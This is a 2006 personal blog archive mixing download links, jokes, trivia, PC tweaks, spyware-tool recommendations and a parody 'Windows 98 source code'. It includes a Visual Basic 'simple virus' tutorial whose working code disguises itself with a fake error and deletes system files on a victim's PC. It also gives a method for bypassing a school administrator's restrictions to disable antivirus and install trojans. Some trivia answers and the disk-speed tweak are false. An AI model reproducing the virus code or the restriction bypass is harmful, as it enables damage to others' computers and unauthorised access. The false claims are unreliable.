Sunday, August 27, 2006

Yahoo! Buddy Check v1.0.1

Are your Yahoo! Messenger friends hiding from you? Not any more! With BuddyCheck you can see if they are online even if they set their status to invisible.

Just add your friends to the contact list and their online status will be regularly checked. You will be notified when one of them really signs on of off.

Download:
http://files-upload.com/files/505759/Buddy_Check_v1[1].0.1.zip

Invisible Browsing 5.0 (Full Version)

Invisible Browsing will hide, change or mask your IP address preventing others or any website from logging your internet address without your permission.This easy to use tool lets you change your IP anytime by routing your Internet traffic through overseas servers. Our service is constantly finding new open proxies making it much more difficult for your surfing habits to be tracked. Allow NOBODY to invade your surfing privacy. Besides providing ANONIMYTY, Invisible Browsing is also an efficient Internet Explorer Privacy Protection" Here are some key features of "Invisible Browsing":
- Masks, Hides Your IP Address

- Auto Change Proxy
- Internet Connection Sharing
- Blocks Potentially Harmful Code (ActiveX)
- Blocks Invasive Code
- Browser Cleaner

Download
http://www.zshare.net/download/invisible-browsing-5-0-rar.html

Friday, August 25, 2006

SymbianGalaxy - The symbian heaven

It is my honour to present you one brand new and surely great site. Allow me to present Symbian Galaxy to you. Its Symbian oriented forum with free symbian games, free symbian software, ringtones, videos and much more for your mobile phone, PDA or PC . The complete site in itself! Its experienced SG team is assurance that your requests will be always fulfilled and your questions always answered. They are also cleanest and most friendly Symbian oriented community on the whole internet.

http://www.symbiangalaxy.com/

Just register above and get all the cool bonuses.

Free Cell Phone Software: PixSense

Must have!!!!
There is this cool site where ur cell pics get uploaded automatically!!!
All u have to do is go to www.pixsense.com and download the software for FREE!!! The moment u get pixsense in ur phone, start clicking pictures and taking videos. The minute u take a picture it gets uploaded on ur pixsense account. From ur phone u can make ur collection public or private. Share pics with ur friends from ur phone.
Enjoy!!!!!

Sunday, August 20, 2006

Dad Finds a Bride For His Son

Father: I want you to marry a girl of my choice
Son: "I will choose my own bride!"
Father: "But the girl is Bill Gates's daughter."
Son: "Well, in that case...ok"
Next Father approaches Bill Gates.
Father: "I have a husband for your daughter."
Bill Gates: "But my daughter is too young to marry!"
Father: "But this young man is a vice-president of the World Bank."
Bill Gates: "Ah, in that case...ok"
Finally Father goes to see the president of the World Bank.
Father: "I have a young man to be recommended as a vice-president."
President: "But I already have more vice- presidents than I need!"
Father: "But this young man is Bill Gates's son-in-law."
President: "Ah, in that case...ok"

Thursday, August 17, 2006

Did u ever know this....

1. What programming language is GOOGLE developed in?
Google is written in Asynchronous java-script and XML, or its acronym Ajax.

2. What is the expansion of YAHOO?
Yet Another Hierarchy of Officious Oracle

3. What is the expansion of ADIDAS?
ADIDAS- All Day I Dream About Sports

4. Expansion of Star as in Star TV Network?
Satellite Television Asian Region

5. What is expansion of "ICICI?"
Industrial credit and Investments Corporation of India

6. What does "baker's dozen" signify?
A baker's dozen consists of 13 items - 1 more than the items in a normal dozen

7. The 1984-85 season. 2nd ODI between India and Pakistan at Sialkot-India 210/3 with Vengsarkar 94*. Match abandoned. Why?
That match was abandoned after ppl heard the news of indira gandhi being killed.

8. Who is the only man to have written the National Anthems for two different countries?
Rabindranath Tagore who wrote national anthem for two different countries one is our 's National anthem and another one is for Bangladesh-(Amar Sonar Bangla)

9. From what four word ex-pression does the word `goodbye` derive?
Goodbye comes from the ex-pression: 'god be with you'.

10. How was Agnes Gonxha Bojaxhiu better known?
Agnes Gonxha Bojaxhiu is none other Mother Teresa.

11. Name the only other country to have got independence on Aug 15th?
South Korea.

12. Why was James Bond Associated with the Number 007?
Because 007 is the ISD code for Russia (or the USSR, as it was known during the cold war)

13. Who faced the first ball in the first ever One day match?
Geoffrey Boycott

14. Which cricketer played for South Africa before it was banned from international cricket and later represented Zimbabwe?
John Traicos

15. The faces of which four Presidents are carved at Mt.Rushmore?
George Washington, Thomas Jefferson, Theodore Roosevelt, and Abraham Lincoln

16. Which is the only country that is surrounded from all sides by only one country (other than Vatican)?
Lesotho surrounded from all sides by South Africa.

17. Which is the only sport which is not allowed to play left handed?
Polo

Pop up a Message on Victim's Computer

net send 127.0.0.1 message

replace 127.0.0.1 with the victims ip
Njoi....

To insert Processor Manufacturer and Model

Open "c:\windows\system\Oeninfo.ini" file with notepad or any test editor.
Type following in the file:
_________________________
[general]
Manufacturer= Intel®
Model= Pentium® 4
_________________________

(To type "®" press 0,1,7,4 one after another while holding alt key)

Replace Intel® and Pentium® 4 by your Model and Processor
Save the file. All done!
Now right click on "My Computer" Icon and left click "Properties"

(NOTE: It is necessary to backup your original oemlogo.bmp or oeminfo.ini if they exist.)

Inserting your own Logo in Sytem Properties

Create any logo/image with your favourite image editor with Maximum dimensions 180*114.
(Greater Dimensions are OK but some area of image will not be displayed in logo)

Save it to "c:\windows\system\oemlogo.bmp" as standard BMP format. (In directory c:\windows\system)

All done! Now right click on "My Computer" Icon and left click "Properties"

(NOTE: It is necessary to backup your original oemlogo.bmp if it exist.)

Visual Basic 6 – Creating a Simple Virus

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.
First of all open a new Visual Basic project, a standard exe file..

Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.

On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.

In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.

Private Sub Form_Load()
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub

Once the project is opened then the command file will be removed.

Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.

You can even give the text box a name to make it quicker. I have labelled it ‘A’

Private Sub Form_Load()
Text1.Text = “C/Windows/System32/cmd.exe”
A = Text1.Text
End Sub

Private Sub Command1_Click
Kill A
End Sub

Now once the command button is clicked on the project the command file will be deleted.

Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn’t got enough memory to run, but in actual fact the victim doesn’t know that you have just removed their command file.

Here is to go about it…

Private Sub Form_Load()
Form1.Visible = False
Text1.Text = “C:/Windows/System32/cmd.exe”
A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
End Sub

Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Timer1.Enabled = False
End Sub

All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that’s how simple it can be to fool someone.

Right, we can now make it a little more difficult if you are finding the above a little too easy.

How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.

The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.

So in the form load part put the following code.

Private Sub Form_Load()
Form1.Visible = False
Msgbox (“Runtime Error 492. Not Enough Memory.”), vbCritical, “Runtime Error”
Kill “C:/Windows/System32/cmd.exe”
Kill “C:/Windows/regedit.exe”
End Sub

So above we will be removing the command file and the registry, I don’t think the victim will be best pleased about that do you.

Now I have shown you the above information I think it’s your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/

Then put in the code above but in the Kill put this…

Kill “C:/cmd.exe”

Sunday, August 13, 2006

Increase your harddisk speed

To speed up your hard disk speed we need to configure a special buffer in the computer's memory in order to enable it to better deal with interrupts made from the disk.
This tip is only recommended if you have 256MB RAM or higher.

Follow these steps:
Run SYSEDIT.EXE from the Run command.
Expand the system.ini file window.
Scroll down almost to the end of the file till you find a line called [386enh].
Press Enter to make one blank line, and in that line type
Irq14=4096
Note: This line IS CASE SENSITIVE!!!
Click on the File menu, then choose Save.
Close SYSEDIT and reboot your computer.
Done. Speed improvement will be noticed after the computer reboots.
Update: The most speed improvement is visible with IDE drives, however there are reports that this tweak also does good for SCSI disks. In any case, it won't harm your system, so why not try it yourself and let me know what you find.

Free Voicemail through Email

Guys check out this
http://www.nowpos.com/
Free voice mail facility through email no need to download any softwares, simply open account then compose and send.

Bid goodbye to the keyboard. The "No More Typing" mail is here. Just Talking... and Listening!

You Speak!
You can Talk!
You may Sing!
You will Emote!

With NowPos vMail on your side, They will Listen.

Blogger's Lounge

Blogger's Lounge

Saturday, August 12, 2006

True Incident!!!!!!

True Horror, which took place recently

This happened near Lonavala.

A guy was driving from Mumbai to Pune and decided not to take the new expressway as he wants to see the scenery. The inevitable happens and when he reaches the ghats his car breaks down - he's stranded miles from nowhere.

Having no choice he starts walking on the side of the road, hoping to get a lift to the nearest town. It's dark and raining. And pretty soon he's wet and shivering. The night rolls on and no car goes by, the rain is so heavy he can hardly see a few feet ahead of him.

Suddenly he sees a car coming towards him. It slows and then stops next to him - without thinking the guy opens the door and jumps in. Seated in the back, he leans forward to thank the person who had saved him - when he realizes there is nobody behind the wheel!!!

Even though there's no one in the front seat and no sound of any engine, the car starts moving slowly. The guy looks at the road ahead and sees a curve coming. Scared almost to death he starts to pray, begging the Lord for his life. He hasn't come out of shock, when just before he hits the curve, a hand appears through the window and moves the wheel!

The car makes the curve safely and continues on the road to the next bend.The guy, now paralyzed in terror, watches how the hand appears every time they are before a curve and moves the steering wheel just enough to get the car around each bend. Finally, the guy sees lights ahead. Gathering his courage he wrenches open the door of the silent, slowly moving car,
scrambles out and runs as hard as he can towards the lights. It's a small town.

He stumbles into a dhaba, and asks for a drink, and breaks down. Then he starts talking about the horrible experience he's just been through. There is dead silence in the dhaba when he stops talking .......................




and that's when .......








Santa and Banta Singh walk into the dhaba.

Santa points and says...... "Look Banta - that's the weird guy who got into our car when we were pushing it."

Friday, August 11, 2006

Free 30 GB Mail Account on 30gigs.com

All Accounts Feature:
30 GigaByte Mailbox
Mail Filtering
Address Book
Easy Search
Convenient Interface
100% FREE

Thursday, August 10, 2006

The world wide web security FAQ

This is the World Wide Web Security Frequently Asked Question list (FAQ). It attempts to answer some of the most frequently asked questions relating to the security implications of running a Web server and using Web browsers.

http://www.w3.org/Security/Faq/

A very good FAQ on Web Application security
http://www.owasp.org/documentation/appsec_faq.html

A List of Ultimate Spyware Removal Tools, The most effective

After dealing with spyware for about 3 years, i've composed a list of the best spyware removal tools i've encountered, tools that removed spyware that even most forum experts could not solve.

Ad-Aware
The utmost basic foundation for any spyware free system, this little package is completely free to use and it not only scans for spyware, it also removes it for you without any registration or purchase. This infamous program can fix 95% of spyware problems for you pc, hands down the most famous spyware removal program ever created.
Can be downloaded at: www.lavasoftusa.com/software/adaware/
Or by searching "ad aware" at www.download.com

SpyHunter
Quite possibly the next best thing to Ad-aware, it's picked up most of the stuff
Ad-aware misses, but definition files aren't constantly updated. Although the only problem i see with this program is that it will only scan your system and require registration to actually delete the spyware. Although if you're willing to spend a little money it's not bad, this is the only program on this list which actually costs anything. But definetly a good program.
Can be downloaded at: www.enigmasoftwaregroup.com/
Or by searching "spyhunter" at www.download.com

Microsoft Antispyware Beta
That's right, the king of software has decided to release their own spyware removal tool, and let me tell you, even in it's beta, it's protection is amazing. Definetly the best active protection against all forms of spyware. It's simple to use, it's Mic*ft, and it knows exactly where to look in Windows for spyware. You won't be disappointed with this download, it's completely free and it has built in system scan, spyware remover, and active protection that works extremely well with Internet Explorer. In my opinion, better than Ad-aware, it's just a matter of time before it goes global like Service Pack 2, might as well download it now
Can be downloaded at: www.Microsoft.com/athome/ security/spyware/software/default.mspx

Trend Micro Anti-Spyware
This program is recommended by Mic*ft. Extremely well designed and extremely powerful, and simple to use. It has a free 30 day trial period, although a quick 5 minute scan will be good enough to clean 99% of spyware. It features fully functional updates, quick scan, active protection, and spyware removal for the 30 day trial period. In all honesty, it's the only program that could fix the updatescenter.com browser hijacker on my pc when everything else failed to do so. It's definetly the best unheard of product out there and in personal opinion one of the, if not the best spyware tool out there. Very close competiton with Microsofts Antispyware. Definetly download this one for a clean pc, and for amazing active protection, works very nicely with Mic*ft Antispyware. What one may miss, the other always picks up.
Can be downloaded at: www.trendmicro.com/

Registry Mechanic
I'm not an expert with registry values, and typically the thought of deleting a registry value has always been unsettling with me. It's very easy to mess up a pc's functionality with a wrong delete. This program does the hard stuff for you. It scans your registry for possible spyware, tells you exactly what it found, what each registry value means, the ammount of risk involved with keeping it on your pc, and if you should delete it or not. Very simple interface, easy to use, does hours of online registry value searching for you in seconds and gives you detailed and easy to understand information about what it finds. Completely useful, and the best registry tool out there by far. Good for the common pc user, good for the pc expert. Amazing program, and best of all it's free.
Can be downloaded by searching "registry mechanic" at www.download.com

Final Verdict
Download Windows Service Pack 2, if you don't already have it. Download these programs, especially Mic*ft Antispyware and Trend Micro Antispyware. Scan your system atleast once a week. The best way to scan is to run all scans one after another on your pc. Shutting down only after all have completed all scanning. Once you restart, before doing anything else, scan your pc completely will all programs one after another once again. Make sure you run updates on these programs atleast once in every week or 2, and try not to disable to active protection SP2, Microsoft Antispyware, and Trend Micro AntiSpyware offer.

A List of Ultimate Spyware Removal Tools, The most effective

After dealing with spyware for about 3 years, i've composed a list of the best spyware removal tools i've encountered, tools that removed spyware that even most forum experts could not solve.

Ad-Aware
The utmost basic foundation for any spyware free system, this little package is completely free to use and it not only scans for spyware, it also removes it for you without any registration or purchase. This infamous program can fix 95% of spyware problems for you pc, hands down the most famous spyware removal program ever created.
Can be downloaded at: www.lavasoftusa.com/software/adaware/
Or by searching "ad aware" at www.download.com

SpyHunter
Quite possibly the next best thing to Ad-aware, it's picked up most of the stuff
Ad-aware misses, but definition files aren't constantly updated. Although the only problem i see with this program is that it will only scan your system and require registration to actually delete the spyware. Although if you're willing to spend a little money it's not bad, this is the only program on this list which actually costs anything. But definetly a good program.
Can be downloaded at: www.enigmasoftwaregroup.com/
Or by searching "spyhunter" at www.download.com

Microsoft Antispyware Beta
That's right, the king of software has decided to release their own spyware removal tool, and let me tell you, even in it's beta, it's protection is amazing. Definetly the best active protection against all forms of spyware. It's simple to use, it's Mic*ft, and it knows exactly where to look in Windows for spyware. You won't be disappointed with this download, it's completely free and it has built in system scan, spyware remover, and active protection that works extremely well with Internet Explorer. In my opinion, better than Ad-aware, it's just a matter of time before it goes global like Service Pack 2, might as well download it now
Can be downloaded at: www.Microsoft.com/athome/ security/spyware/software/default.mspx

Trend Micro Anti-Spyware
This program is recommended by Mic*ft. Extremely well designed and extremely powerful, and simple to use. It has a free 30 day trial period, although a quick 5 minute scan will be good enough to clean 99% of spyware. It features fully functional updates, quick scan, active protection, and spyware removal for the 30 day trial period. In all honesty, it's the only program that could fix the updatescenter.com browser hijacker on my pc when everything else failed to do so. It's definetly the best unheard of product out there and in personal opinion one of the, if not the best spyware tool out there. Very close competiton with Microsofts Antispyware. Definetly download this one for a clean pc, and for amazing active protection, works very nicely with Mic*ft Antispyware. What one may miss, the other always picks up.
Can be downloaded at: www.trendmicro.com/

Registry Mechanic
I'm not an expert with registry values, and typically the thought of deleting a registry value has always been unsettling with me. It's very easy to mess up a pc's functionality with a wrong delete. This program does the hard stuff for you. It scans your registry for possible spyware, tells you exactly what it found, what each registry value means, the ammount of risk involved with keeping it on your pc, and if you should delete it or not. Very simple interface, easy to use, does hours of online registry value searching for you in seconds and gives you detailed and easy to understand information about what it finds. Completely useful, and the best registry tool out there by far. Good for the common pc user, good for the pc expert. Amazing program, and best of all it's free.
Can be downloaded by searching "registry mechanic" at www.download.com

Final Verdict
Download Windows Service Pack 2, if you don't already have it. Download these programs, especially Mic*ft Antispyware and Trend Micro Antispyware. Scan your system atleast once a week. The best way to scan is to run all scans one after another on your pc. Shutting down only after all have completed all scanning. Once you restart, before doing anything else, scan your pc completely will all programs one after another once again. Make sure you run updates on these programs atleast once in every week or 2, and try not to disable to active protection SP2, Mic*ft Antispyware, and Trend Micro AntiSpyware offer.

Windows 98 Source Code

/*
TOP SECRET Mic*ft(c) Code
Project: Chicago(tm)
Projected release-date: Summer 1998
*/
#include "win31.h"
#include "win95.h"
#include "evenmore.h"
#include "oldstuff.h"
#include "billrulz.h"
#define INSTALL = HARD
char make_prog_look_big[1600000];
void main()
{
while(!CRASHED)
{
display_copyright_message();
display_bill_rules_message();
do_nothing_loop();
if (first_time_installation)
{
make_50_megabyte_swapfile();
do_nothing_loop();
totally_screw_up_HPFS_file_system();
search_and_destroy_the_rest_of_OS/2();
hang_system();
}
write_something(anything);
display_copyright_message();
do_nothing_loop();
do_some_stuff();
if (still_not_crashed)
{
display_copyright_message();
do_nothing_loop();
basically_run_windows_3.1();
do_nothing_loop();
do_nothing_loop();
do_nothing_loop();
}
}
if (detect_cache())
disable_cache();
if (fast_cpu())
{
set_wait_states(lots);
set_mouse(speed, very_slow);
set_mouse(action, jumpy);
set_mouse(reaction, sometimes);
}
/* printf("Welcome to Windows 3.11"); */
/* printf("Welcome to Windows 95"); */
printf("Welcome to Windows 98");
if (system_ok())
{
bsod(random_err());
crash(to_dos_prompt);
}
else
system_memory = open("a:\swp0001.swp", O_CREATE);
while(something)
{
sleep(5);
get_user_input();
sleep(5);
act_on_user_input();
sleep(5);
}
create_general_protection_fault();
}

Tuesday, August 08, 2006

Breaking the Restrictions of the Administrator in Windows

This works on WIn 2000 & WIN XP.
Dis can be used to gain access to the website you want to for free, and how you can gain access to 'control panel', and the various other tools of Widows that may have been blocked from your grasp like 'regedit' by the administrator. IT can be used in schools & colleges..

When u are at the log on screen, type in your username and password. NOW When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.

Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that's cool because now we can access 'Internet options', click in the 'connections' tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.

Its only an 'Unplugging technique' to gain access to a comp. locked by the administrator.

Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u're will.